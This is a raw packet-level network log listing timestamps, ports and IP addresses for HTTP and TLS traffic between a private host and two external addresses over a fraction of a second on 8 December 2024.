Dec 8, 2024 13:31:23.022254944 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.022330046 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.022349119 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.022386074 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.023236990 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.023339987 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.023367882 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.023452044 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.024230957 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.024307966 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.024327040 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.024396896 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.025244951 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.025325060 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.025336027 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.025407076 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.026176929 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.026232004 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.026258945 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.026319981 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.027152061 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.027219057 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.027327061 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.027420044 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.028170109 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.028254032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.028283119 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.028372049 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.029151917 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.029256105 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.029263973 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.029356956 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.030210018 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.030255079 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.030283928 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.030369997 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.066457033 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.066509962 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.066637993 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.066981077 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.067085981 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.067373037 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.068001032 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.068084002 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.068110943 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.068985939 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.069106102 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.069106102 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.069178104 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.070008993 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.070058107 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.070067883 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.070333004 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.070986986 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.071068048 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.071120024 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.071181059 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.072000980 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.072097063 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.072144985 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.072242022 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.073172092 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.073266029 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.073286057 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.073476076 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.074059963 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.074140072 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.074165106 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.074239969 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.074990988 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.075043917 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.075119019 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.075242043 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.076114893 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.076180935 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.076191902 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.076282024 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.076891899 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.077033997 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.077065945 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.077131987 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.077883959 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.077934980 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.078030109 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.078888893 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.078952074 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.078969002 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.079185963 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.079898119 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.080005884 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.080007076 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.080142975 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.080873966 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.080941916 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.080985069 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.081043005 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.081903934 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.081970930 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.082066059 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.082112074 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.134732008 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.134835958 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.134891987 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.134891987 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.135288954 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.135359049 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.135380983 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.135399103 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.135477066 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.135492086 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.135509968 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.135572910 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.135575056 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.136271000 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.136452913 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.136998892 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.137151957 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.137190104 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.137260914 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.137465000 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.137516975 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.138191938 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.138325930 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.138353109 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.138433933 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.139221907 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.139348030 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.139375925 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.139509916 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.140198946 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.140296936 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.140310049 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.140355110 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.141215086 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.141319990 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.141375065 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.141473055 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.142179012 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.142299891 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.142303944 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.142354965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.143249035 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.143310070 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.143485069 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.182121992 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.182216883 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.182621956 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.182631969 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.182852983 CET	49746	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.182857990 CET	443	49746	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.184505939 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.184526920 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.184607983 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.184607983 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.184621096 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.184712887 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.197307110 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.197333097 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.197500944 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.197828054 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.197941065 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.197954893 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.198019981 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.198651075 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.198678017 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.198945045 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.199498892 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.199610949 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.199631929 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.200453997 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.200558901 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.200583935 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.200654984 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.201488972 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.201632977 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.201716900 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.202542067 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.202626944 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.202733994 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.203485012 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.203506947 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.203587055 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.203587055 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.204421043 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.204473972 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.204514027 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.204808950 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.205432892 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.205513000 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.206460953 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.206485033 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.206584930 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.207367897 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.207396030 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.207488060 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.208410025 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.208422899 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.208440065 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.209388971 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.209419012 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.209481001 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.210015059 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.210340023 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.210391045 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.211394072 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.211426020 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.211467981 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.212485075 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.212513924 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.212583065 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.213372946 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.213396072 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.213565111 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.213963032 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.214303970 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.214407921 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.215296984 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.215332031 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.215394974 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.216331005 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.216362000 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.216399908 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.217336893 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.217360020 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.217379093 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.217880964 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.218282938 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.218383074 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.219261885 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.219291925 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.219377041 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.220287085 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.220316887 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.220364094 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.221275091 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.221303940 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.221368074 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.222059965 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.222244024 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.222321033 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.224870920 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.258379936 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.258471966 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.258605003 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.258691072 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.258758068 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.258781910 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.259825945 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.259854078 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.259959936 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.260827065 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.260868073 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.261040926 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.261146069 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.261179924 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.262056112 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.262093067 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.262166977 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.262181044 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.262223005 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.263045073 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.263137102 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.263164997 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.263324022 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.264027119 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.264084101 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.264146090 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.265022039 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.265152931 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.265182018 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.265974045 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.266005039 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.266082048 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.267004967 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.267029047 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.267086983 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.268007040 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.268033028 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.268084049 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.268966913 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.268995047 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.269059896 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.269886017 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.269980907 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.270097971 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.270937920 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.270982981 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.271039963 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.271949053 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.271972895 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.272015095 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.272326946 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.272965908 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.273003101 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.273056984 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.273881912 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.274072886 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.278455973 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.278481960 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.278498888 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.278513908 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.278532982 CET	443	49744	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.278558016 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.278558016 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.278635025 CET	49744	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.304344893 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.304368019 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.304425955 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.304444075 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.304451942 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.304594040 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.326576948 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.326633930 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.326659918 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.326713085 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.327091932 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.327177048 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.327202082 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.327330112 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.328089952 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.328207970 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.328212976 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.328282118 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.329125881 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.329211950 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.329355955 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.330123901 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.330177069 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.330198050 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.330199957 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.330252886 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.330279112 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.330279112 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.330306053 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.330317020 CET	443	49742	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:23.330374956 CET	49742	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:23.331058979 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.331136942 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:23.331151962 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:23.331207991 CET	49724	80	192.168.2.6	185.215.113.206
